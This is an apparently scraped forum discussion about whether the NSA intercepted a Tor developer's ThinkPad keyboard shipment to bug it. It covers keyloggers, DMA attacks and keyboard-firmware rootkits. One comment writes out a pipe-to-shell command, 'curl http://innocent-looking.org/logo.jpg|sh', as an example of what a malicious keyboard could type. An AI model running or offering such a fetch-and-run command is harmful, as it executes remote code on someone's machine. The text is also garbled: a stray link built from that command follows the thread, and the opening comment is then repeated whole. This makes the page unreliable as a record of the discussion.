The intelligence agency whose massive scope and pervasive operational shortcomings were recently exposed by one low-level operative had a slip-up in applying a well-publicized tactic to an obviously high value target.
A few comments:
• This "low-level operative" was a system administrator who used social engineering to obtain other people's authentication credentials and gain access to material to which he wasn't authorized. He wasn't the janitor or some clueless field agent.
• Did Snowden expose operational shortcomings? Absolutely. A lot of the programs that have been publicly revealed through his leaks have been running for over a decade without ever seeing the light of day, though. That tells me these "pervasive operational shortcomings" aren't very pervasive. (If they were, the NSA would be absolute shit at their mission.)
• I don't think Andrea is a "high value target," or at least high value enough to risk compromising whatever method they might use to bug her keyboard. I don't say this to belittle her or her work in any way — she seems to be a skilled programmer/hacker/infosec person. And that's exactly why this whole "the NSA is bugging her keyboard" theory doesn't make any sense.
Let's assume for the sake of argument that the NSA had planned to bug her keyboard, and that keyboard is now sitting in an NSA (or contractor) facility in/near Alexandria, Virginia, waiting for some modification to be made before shipping it back out. But, oops, they screwed up and forgot to fake the USPS tracking information. They know she knows because she tweeted about it. She's also tweeted that she can never trust the keyboard if/when it shows up. Why would they ship her a bugged keyboard at this point? If/when the keyboard shows up, she's probably going to take it apart and share anything interesting she finds with the world. There will be hard evidence.
Even if they hadn't bungled the tracking information in our hypothetical argument, they're risking exposure of the exact methods they use to bug a machine for not much potential gain. (Remember, Andrea's a skilled hacker/programmer. There's a very good chance she'll figure out what's going on and tell the world if she has any inkling that her laptop's been tampered with.)
• The keyboard she ordered fits a ThinkPad T60/T61/T400/T500 (and the equivalent "R" models, plus a few others). Internally, the keyboard and TrackPoint speak PS/2. While they could log keystrokes to an on-board chip and transmit keystrokes via radio, there aren't any especially interesting things the NSA can do to her laptop via a modified keyboard. They certainly won't be rooting it that way.
• I said that I don't think Andrea is a "high value target," despite her work on Tor, because everything about Tor is open. Anyone can download the code and see exactly how it works. The protocol is well-known. There's no curtain to peek behind and gain strategic information about Tor's workings.
So while I don't reject the argument that the NSA is trying to bug her laptop as impossible, I think it's exceedingly improbable. My money's still on "seller screwed up the tracking number."
I also like the part where the NSA is guarded by the Catch-22 "it wasn't them, because if it was, you'd never know", such that that there's no scenario in which you could be convinced that the NSA did anything.
The flip side of this argument, which everyone here seems to be clutching onto and running with, is that if the NSA is capable of it, they're doing it at every available opportunity, even when it doesn't make any sense to.
> Internally, the keyboard and TrackPoint speak PS/2. While they could log keystrokes to an on-board chip and transmit keystrokes via radio, there aren't any especially interesting things the NSA can do to her laptop via a modified keyboard. They certainly won't be rooting it that way.
This is a joke, right? A keyboard and a keylogger would give you everything you need to root a computer.
My point was that the modified keyboard alone couldn't do it. It's not a FireWire device that can read/write things from/to memory however it pleases, insta-pwning a computer as soon as it's connected (unless something like VT-d is being used to contain DMA transfers). It's not even a USB device that could abuse some poorly written driver to gain access.
If a hypothetical modified keyboard is logging keystrokes, someone has to eventually retrieve it to get the logged data. If it's transmitting keystrokes via radio, someone has to be nearby to capture them and then steal the laptop to get at its (presumably encrypted) data.
Why when a shell is focused? Better to wait until the keyboard has been idle for some time, then send the keystrokes to open a shell, execute the needed commands, and close it afterward.
Here's a fun thought exercise for you, since my first reply didn't spark one. Imagine you're an evil keyboard. What evil could you accomplish? Hint: you don't even need your own radio, the computer's already got one.
"we describe how to tamper with a firmware upgrade
to the Apple Aluminum Keyboard. We describe
how an attacker can subvert an off-the-shelf keyboard by
embedding into the firmware malicious code which allows
a rootkit to survive a clean re-installation of the host
operating system."
DMA via FireWire (or Thunderbolt or similar) allows you to very quickly poke at system memory with a near-zero risk of being detected.
An autonomously malicious PS/2 keyboard, on the other hand, is on the end of a slow (~12 kbit/s) serial interface. It can only simulate keypresses and receive updates about the keyboard LEDs' statuses. It doesn't know the current state of the system. It's as likely to type "curl http://innocent-looking.org/logo.jpg|sh" in a text editor as it is at a command prompt, so it can't type anything autonomously without running the (huge) risk of alerting its owner to its presence.
Edit: The "Reversing and exploiting an Apple firmware update" paper linked below talks about persisting a rootkit on a computer by using Spotlight to open Terminal, then typing a command to download and execute a payload. That runs the same risk of alerting the user to its presence, and it will completely fail if the user has remapped Cmd-Space to something else.
I would speculate that they might be interested in submitting a patch that compromises the Tor network in some subtle way that only they can exploit, and doing it in her name. Maybe added on to some other big change she submitted, in the hope that nobody will notice it.
Seems the Tor project is using Git for all of their projects, so doing something like that would probably require pwning whatever system she's creating commits on. I will say that putting a bug or something in her keyboard doesn't seem like a terribly efficient way of doing this.
I don't really think that they're trying to break Tor like this. More of a thought experiment - to figure out the likelihood that this is part of an attempt to break Tor, run through the details of exactly how this would be part of such an attempt. It doesn't sound all that practical when you run though how it would work if it was. If they wanted to do it, you'd think they have better ways then a rather sloppy attempt to intercept a laptop keyboard shipment, if that's actually what this was, instead of an ordinary shipment screw-up.
All good points, and I'd second that Andrea is unlikely to be a "high value target" [BTW, curious, who is building and releasing Tor binaries and Tor dependencies binaries?]. Still, as a developer she is a Tor user and it is possible that NSA opportunistically targets all Tor users. And even if not, I'm still finding it distasteful that NSA can legally intercept post and put up dragnet surveillance. It feels like they are using legal loopholes too. Not fair.
That generated more response than I expected. I actually do agree that, on balance, it's somewhat more likely that it's just a benign glitch; I should have said that. What I was really taking issue with is the dismissiveness with you treated the suggestion that this might be an NSA attack. I was responding to what I saw as a slanted and unreasonable framing by doing the same thing from the other end.
So with less snark: I don't think it's exceedingly improbable at all, and whether ultimately it turns out to be the case or not, smugly guffawing the idea that the NSA may have used a trick like that isn't warranted. They really do intercept people's laptop shipments [1] to plant malware in them. They really do sneak tiny radio transmitters into end-user hardware. They really are trying to get backdoors into communication tools. I'll put it this way: if I worked on the kind of software Andrea works on, I would be seriously alarmed. Would you keep the keyboard?
On some specific points you made:
* That Snowden had access to other people's credentials seems like a serious operational shortcoming to me. The "low-level" part wasn't an attack on Snowden; the point is that a lot of people have that level of access. In general, the US intelligence apparatus makes a lot of well-publicized mistakes; I'm sure they make a great number of more subtle ones.
* On the NSA's shortcomings generally, I think this is actually nicely illustrative. Because a lot of the stuff Snowden revealed were things a lot of credible people already believed, based on things like weird locked server closets in telecom buildings and PRNGs that seemed fishy and pointless and heresay reports of requests for backdoor access to communication tools and so on. There was just little hard evidence before Snowden. And there won't be here either. So this is entirely consistent with the what the NSA was like in those decades where their programs "never saw the light of day".
* I think being a core Tor developer makes her high value target. It's hard to imagine the NSA wanting to subvert all the things it's subverted and not wanting to backdoor Tor. Keylogging her keyboard is a great way to do that, either by compromising her somehow, or by just stealing her credentials. So I don't follow the "it doesn't make any sense" line of thinking.
* That she's now tweeted about certainly makes it unlikely that, if the NSA has it, they'll go through with sending it bugged. But so?
Where I come out on this is that yes, it's probably nothing, but it should be treated with suspicion and carefulness, not laughed off because haha, what, do you think you're in a spy movie or something? Because, basically, we are.
[1] Yes, I know this is just the keyboard. I don't think that's a relevant difference.
What I was really taking issue with is the dismissiveness with you treated the suggestion that this might be an NSA attack. I was responding to what I saw as a slanted and unreasonable framing by doing the same thing from the other end.
I was dismissing the linked blog post as much as the suggestion of NSA involvement. The blog post took a single tweet with a single screenshot, screwed up half the facts ("tracking details for a computer Shepard ordered" — uh, no, it was a used laptop keyboard), sensationalized the other half ("it moved another four times around the military and industrial belt" — uh, no, it moved from IAD to Alexandria), and tacked a pile of rhetorical questions and conjecture on the end.
![http://innocent-looking.org/logo.jpg|sh"](http://innocent-looking.org/logo.jpg|sh"){kind=link}
A few comments:
• This "low-level operative" was a system administrator who used social engineering to obtain other people's authentication credentials and gain access to material to which he wasn't authorized. He wasn't the janitor or some clueless field agent.
• Did Snowden expose operational shortcomings? Absolutely. A lot of the programs that have been publicly revealed through his leaks have been running for over a decade without ever seeing the light of day, though. That tells me these "pervasive operational shortcomings" aren't very pervasive. (If they were, the NSA would be absolute shit at their mission.)
• I don't think Andrea is a "high value target," or at least high value enough to risk compromising whatever method they might use to bug her keyboard. I don't say this to belittle her or her work in any way — she seems to be a skilled programmer/hacker/infosec person. And that's exactly why this whole "the NSA is bugging her keyboard" theory doesn't make any sense.
Let's assume for the sake of argument that the NSA had planned to bug her keyboard, and that keyboard is now sitting in an NSA (or contractor) facility in/near Alexandria, Virginia, waiting for some modification to be made before shipping it back out. But, oops, they screwed up and forgot to fake the USPS tracking information. They know she knows because she tweeted about it. She's also tweeted that she can never trust the keyboard if/when it shows up. Why would they ship her a bugged keyboard at this point? If/when the keyboard shows up, she's probably going to take it apart and share anything interesting she finds with the world. There will be hard evidence.
Even if they hadn't bungled the tracking information in our hypothetical argument, they're risking exposure of the exact methods they use to bug a machine for not much potential gain. (Remember, Andrea's a skilled hacker/programmer. There's a very good chance she'll figure out what's going on and tell the world if she has any inkling that her laptop's been tampered with.)
• The keyboard she ordered fits a ThinkPad T60/T61/T400/T500 (and the equivalent "R" models, plus a few others). Internally, the keyboard and TrackPoint speak PS/2. While they could log keystrokes to an on-board chip and transmit keystrokes via radio, there aren't any especially interesting things the NSA can do to her laptop via a modified keyboard. They certainly won't be rooting it that way.
• I said that I don't think Andrea is a "high value target," despite her work on Tor, because everything about Tor is open. Anyone can download the code and see exactly how it works. The protocol is well-known. There's no curtain to peek behind and gain strategic information about Tor's workings.
So while I don't reject the argument that the NSA is trying to bug her laptop as impossible, I think it's exceedingly improbable. My money's still on "seller screwed up the tracking number."
I also like the part where the NSA is guarded by the Catch-22 "it wasn't them, because if it was, you'd never know", such that that there's no scenario in which you could be convinced that the NSA did anything.
The flip side of this argument, which everyone here seems to be clutching onto and running with, is that if the NSA is capable of it, they're doing it at every available opportunity, even when it doesn't make any sense to.